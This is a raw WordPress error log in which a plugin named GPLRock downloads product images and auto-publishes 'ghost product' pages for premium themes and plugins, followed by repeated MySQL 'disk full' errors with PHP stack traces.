/home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b9c2c17.jpg [05-Apr-2026 12:22:18 UTC] GPLRock: Using pre-downloaded image for product elegant-themes-divi-wordpress-theme-layouts: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b9c2c17.jpg [05-Apr-2026 12:22:18 UTC] GPLRock: Ghost product published with image - Product ID: elegant-themes-divi-wordpress-theme-layouts [05-Apr-2026 12:22:20 UTC] GPLRock: Image downloaded successfully for product elements-kit-all-in-one-addons-for-elementor-page-builder (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4ca74cb.jpg [05-Apr-2026 12:22:20 UTC] GPLRock: Using pre-downloaded image for product elements-kit-all-in-one-addons-for-elementor-page-builder: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e4ca74cb.jpg [05-Apr-2026 12:22:20 UTC] GPLRock: Ghost product published with image - Product ID: elements-kit-all-in-one-addons-for-elementor-page-builder [05-Apr-2026 12:22:21 UTC] GPLRock: Image downloaded successfully for product phlox-pro-elementor-multipurpose-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ff68d21.avif [05-Apr-2026 12:22:22 UTC] GPLRock: Using pre-downloaded image for product phlox-pro-elementor-multipurpose-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0ff68d21.avif [05-Apr-2026 12:22:22 UTC] GPLRock: Ghost product published with image - Product ID: phlox-pro-elementor-multipurpose-wordpress-theme [05-Apr-2026 12:22:23 UTC] GPLRock: Image downloaded successfully for product fs-poster-gpl-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4616a57b.jpg [05-Apr-2026 12:22:23 UTC] GPLRock: Using pre-downloaded image for product fs-poster-gpl-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4616a57b.jpg [05-Apr-2026 12:22:23 UTC] GPLRock: Ghost product published with image - Product ID: fs-poster-gpl-plugin [05-Apr-2026 12:22:25 UTC] GPLRock: Image downloaded successfully for product digits-wordpress-mobile-number-signup-and-login (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6d102c9d.png [05-Apr-2026 12:22:25 UTC] GPLRock: Using pre-downloaded image for product digits-wordpress-mobile-number-signup-and-login: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6d102c9d.png [05-Apr-2026 12:22:25 UTC] GPLRock: Ghost product published with image - Product ID: digits-wordpress-mobile-number-signup-and-login [05-Apr-2026 12:22:26 UTC] GPLRock: Image downloaded successfully for product slider-revolution-responsive-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4138fbd.avif [05-Apr-2026 12:22:26 UTC] GPLRock: Using pre-downloaded image for product slider-revolution-responsive-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b4138fbd.avif [05-Apr-2026 12:22:26 UTC] GPLRock: Ghost product published with image - Product ID: slider-revolution-responsive-wordpress-plugin [05-Apr-2026 12:22:28 UTC] GPLRock: Image downloaded successfully for product rehub-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-101e95de.avif [05-Apr-2026 12:22:28 UTC] GPLRock: Using pre-downloaded image for product rehub-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-101e95de.avif [05-Apr-2026 12:22:28 UTC] GPLRock: Ghost product published with image - Product ID: rehub-theme [05-Apr-2026 12:24:18 UTC] GPLRock: Image downloaded successfully for product gravityview-advanced-filter-extension (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72af6936.jpg [05-Apr-2026 12:24:18 UTC] GPLRock: Using pre-downloaded image for product gravityview-advanced-filter-extension: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72af6936.jpg [05-Apr-2026 12:24:18 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-advanced-filter-extension [05-Apr-2026 12:24:19 UTC] GPLRock: Image downloaded successfully for product searchwp-metrics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a6772e4.jpg [05-Apr-2026 12:24:19 UTC] GPLRock: Using pre-downloaded image for product searchwp-metrics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4a6772e4.jpg [05-Apr-2026 12:24:19 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-metrics [05-Apr-2026 12:24:20 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-mycred-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d11a60a.jpg [05-Apr-2026 12:24:20 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-mycred-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4d11a60a.jpg [05-Apr-2026 12:24:20 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-mycred-integration [05-Apr-2026 12:24:22 UTC] GPLRock: Image downloaded successfully for product jetsloth-gravity-forms-bulk-add-fields (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1830aff.jpg [05-Apr-2026 12:24:33 UTC] GPLRock: Using pre-downloaded image for product jetsloth-gravity-forms-bulk-add-fields: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e1830aff.jpg [05-Apr-2026 12:24:33 UTC] GPLRock: Ghost product published with image - Product ID: jetsloth-gravity-forms-bulk-add-fields [05-Apr-2026 12:24:34 UTC] GPLRock: Image downloaded successfully for product woocommerce-review-for-discount (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef01f6d9.jpg [05-Apr-2026 12:24:34 UTC] GPLRock: Using pre-downloaded image for product woocommerce-review-for-discount: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-ef01f6d9.jpg [05-Apr-2026 12:24:34 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-review-for-discount [05-Apr-2026 12:24:35 UTC] GPLRock: Image downloaded successfully for product gravity-forms-getresponse-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f1348e1.jpg [05-Apr-2026 12:24:36 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-getresponse-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f1348e1.jpg [05-Apr-2026 12:24:36 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-getresponse-addon [05-Apr-2026 12:24:37 UTC] GPLRock: Image downloaded successfully for product gravity-forms-agile-crm-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64347503.jpg [05-Apr-2026 12:24:37 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-agile-crm-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-64347503.jpg [05-Apr-2026 12:24:37 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-agile-crm-addon [05-Apr-2026 12:24:38 UTC] GPLRock: Image downloaded successfully for product woocommerce-point-of-sale-pos (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdffad70.jpg [05-Apr-2026 12:24:38 UTC] GPLRock: Using pre-downloaded image for product woocommerce-point-of-sale-pos: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-fdffad70.jpg [05-Apr-2026 12:24:38 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-point-of-sale-pos [05-Apr-2026 12:24:41 UTC] GPLRock: Image download failed for product woocommerce-redsys-gateway (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:24:45 UTC] GPLRock: Image download failed for product woocommerce-redsys-gateway (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:24:49 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-RedSys-Gateway.jpg for product woocommerce-redsys-gateway after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:24:51 UTC] GPLRock: Image download failed for product woocommerce-redsys-gateway (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:24:55 UTC] GPLRock: Image download failed for product woocommerce-redsys-gateway (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:24:59 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-RedSys-Gateway.jpg for product woocommerce-redsys-gateway after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:24:59 UTC] GPLRock WARNING: Image download failed for product woocommerce-redsys-gateway. URL: https://www.gplrock.com/wp-content/uploads/2020/07/WooCommerce-RedSys-Gateway.jpg [05-Apr-2026 12:24:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-redsys-gateway [05-Apr-2026 12:25:00 UTC] GPLRock: Image downloaded successfully for product woocommerce-anti-fraud (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bbabb13.jpg [05-Apr-2026 12:25:00 UTC] GPLRock: Using pre-downloaded image for product woocommerce-anti-fraud: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bbabb13.jpg [05-Apr-2026 12:25:00 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-anti-fraud [05-Apr-2026 12:26:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf0.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, set_transient, update_option [05-Apr-2026 12:26:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf1.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, set_transient, update_option [05-Apr-2026 12:26:23 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf2.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Core->log [05-Apr-2026 12:26:33 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf3.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.* FROM wpwf_gplrock_products p LEFT JOIN wpwf_gplrock_ghost_content gc ON p.product_id = gc.product_id WHERE p.status = 'active' AND gc.id IS NULL ORDER BY p.id LIMIT 10 OFFSET 371 made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Content::publish_ghost_products [05-Apr-2026 12:26:33 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf4.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, GPLRock\Core->handle_auto_publish, GPLRock\Core->log [05-Apr-2026 12:26:33 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf5.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->check_auto_publish_on_init, delete_transient, delete_option [05-Apr-2026 12:26:33 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf6.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:26:33 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdf7.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:26:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdfc.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-blog\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [05-Apr-2026 12:26:34 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdfd.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [05-Apr-2026 12:26:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d109f7-fdfe.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_products` made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->handle_download_redirect [05-Apr-2026 12:26:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10b73-a82d.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:26:35 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10b73-a82e.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fd5-d566.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:27:18 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d10fd5-d567.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:27:54 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113c8-1150c.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:27:54 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113c8-1150d.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require('wp-blog-header.php'), require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:27:55 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113c8-11512.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT p.ID, pm.meta_value FROM wpwf_postmeta as pm INNER JOIN wpwf_posts as p ON pm.post_id = p.ID WHERE pm.meta_key = 'ehf_target_include_locations' AND p.post_type = 'elementor-hf' AND p.post_status = 'publish' AND (pm.meta_value LIKE '%\"basic-global\"%' OR pm.meta_value LIKE '%\"special-blog\"%') ORDER BY p.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, HFE_Elementor_Canvas_Compat->hooks, hfe_header_enabled, Header_Footer_Elementor::get_settings, Header_Footer_Elementor::get_template_id, HFE\Lib\Astra_Target_Rules_Fields->get_posts_by_conditions [05-Apr-2026 12:27:55 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113c8-11513.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SELECT wpwf_posts.* FROM wpwf_posts INNER JOIN wpwf_postmeta ON ( wpwf_posts.ID = wpwf_postmeta.post_id ) WHERE 1=1 AND ( ( wpwf_postmeta.meta_key = 'elementskit_template_activation' AND wpwf_postmeta.meta_value = 'yes' ) ) AND wpwf_posts.post_type = 'elementskit_template' AND ((wpwf_posts.post_status = 'publish')) GROUP BY wpwf_posts.ID ORDER BY wpwf_posts.post_date DESC made by require('wp-blog-header.php'), wp, WP->main, do_action_ref_array('wp'), WP_Hook->do_action, WP_Hook->apply_filters, ElementsKit_Lite\Modules\Header_Footer\Activator->hooks, ElementsKit_Lite\Modules\Header_Footer\Activator::template_ids, ElementsKit_Lite\Modules\Header_Footer\Activator->the_filter, get_posts, WP_Query->query, WP_Query->get_posts [05-Apr-2026 12:27:55 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113c8-11514.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_products` made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), do_action('template_redirect'), WP_Hook->do_action, WP_Hook->apply_filters, GPLRock\Public_Frontend->template_redirect, GPLRock\Public_Frontend->handle_download_redirect [05-Apr-2026 12:27:56 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113f0-9c65.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:27:56 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d113f0-9c66.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:29:19 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d78-17e7a.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_gplrock_logs` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, {closure}, GPLRock\Core::get_instance, GPLRock\Core->__construct, GPLRock\Core->init, GPLRock\Core->log [05-Apr-2026 12:29:19 UTC] WordPress database error Disk full (/tmp/#sql-temptable-ace7-d11d78-17e7b.MAI); waiting for someone to free some space... (errno: 28 "No space left on device") for query SHOW FULL COLUMNS FROM `wpwf_options` made by require_once('wp-load.php'), require_once('wp-config.php'), require_once('wp-settings.php'), do_action('plugins_loaded'), WP_Hook->do_action, WP_Hook->apply_filters, hfe_init, Header_Footer_Elementor::instance, Header_Footer_Elementor->__construct, update_option [05-Apr-2026 12:36:40 UTC] GPLRock: Image downloaded successfully for product soho-hotel-booking-calendar (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ab936c7.jpg [05-Apr-2026 12:36:40 UTC] GPLRock: Using pre-downloaded image for product soho-hotel-booking-calendar: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4ab936c7.jpg [05-Apr-2026 12:36:40 UTC] GPLRock: Ghost product published with image - Product ID: soho-hotel-booking-calendar [05-Apr-2026 12:36:42 UTC] GPLRock: Image downloaded successfully for product transcargo-transportation-wordpress-theme-for-logistics (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b85de2b.jpg [05-Apr-2026 12:36:42 UTC] GPLRock: Using pre-downloaded image for product transcargo-transportation-wordpress-theme-for-logistics: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3b85de2b.jpg [05-Apr-2026 12:36:42 UTC] GPLRock: Ghost product published with image - Product ID: transcargo-transportation-wordpress-theme-for-logistics [05-Apr-2026 12:36:44 UTC] GPLRock: Image download failed for product seowp-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:36:49 UTC] GPLRock: Image download failed for product seowp-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:36:53 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/SEOWP-SEO-Digital-Marketing-WordPress-Theme.png for product seowp-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:36:55 UTC] GPLRock: Image download failed for product seowp-seo-digital-marketing-wordpress-theme (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:36:59 UTC] GPLRock: Image download failed for product seowp-seo-digital-marketing-wordpress-theme (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 12:37:03 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2021/11/SEOWP-SEO-Digital-Marketing-WordPress-Theme.png for product seowp-seo-digital-marketing-wordpress-theme after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 12:37:03 UTC] GPLRock WARNING: Image download failed for product seowp-seo-digital-marketing-wordpress-theme. URL: https://www.gplrock.com/wp-content/uploads/2021/11/SEOWP-SEO-Digital-Marketing-WordPress-Theme.png [05-Apr-2026 12:37:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: seowp-seo-digital-marketing-wordpress-theme [05-Apr-2026 12:37:04 UTC] GPLRock: Image downloaded successfully for product travele-travel-tour-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6420f601.jpg [05-Apr-2026 12:37:04 UTC] GPLRock: Using pre-downloaded image for product travele-travel-tour-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6420f601.jpg [05-Apr-2026 12:37:04 UTC] GPLRock: Ghost product published with image - Product ID: travele-travel-tour-agency-elementor-template-kit [05-Apr-2026 12:37:06 UTC] GPLRock: Image downloaded successfully for product socialzy-social-media-marketing-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0b30f4b.jpg [05-Apr-2026 12:37:06 UTC] GPLRock: Using pre-downloaded image for product socialzy-social-media-marketing-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c0b30f4b.jpg [05-Apr-2026 12:37:06 UTC] GPLRock: Ghost product published with image - Product ID: socialzy-social-media-marketing-agency-elementor-template-kit [05-Apr-2026 12:37:08 UTC] GPLRock: Image downloaded successfully for product moverie-movers-packers-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af6da8ab.jpg [05-Apr-2026 12:37:08 UTC] GPLRock: Using pre-downloaded image for product moverie-movers-packers-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af6da8ab.jpg [05-Apr-2026 12:37:08 UTC] GPLRock: Ghost product published with image - Product ID: moverie-movers-packers-service-elementor-template-kit [05-Apr-2026 12:37:09 UTC] GPLRock: Image downloaded successfully for product influence-marketing-seo-digital-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8e1cb98.webp [05-Apr-2026 12:37:10 UTC] GPLRock: Using pre-downloaded image for product influence-marketing-seo-digital-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e8e1cb98.webp [05-Apr-2026 12:37:10 UTC] GPLRock: Ghost product published with image - Product ID: influence-marketing-seo-digital-agency-elementor-template-kit [05-Apr-2026 12:37:11 UTC] GPLRock: Image downloaded successfully for product indusc-construction-industrial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f1ab7f5.webp [05-Apr-2026 12:37:11 UTC] GPLRock: Using pre-downloaded image for product indusc-construction-industrial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6f1ab7f5.webp [05-Apr-2026 12:37:11 UTC] GPLRock: Ghost product published with image - Product ID: indusc-construction-industrial-elementor-template-kit [05-Apr-2026 12:37:13 UTC] GPLRock: Image downloaded successfully for product kipso-education-lms-wordpress-theme (attempt 1) to: 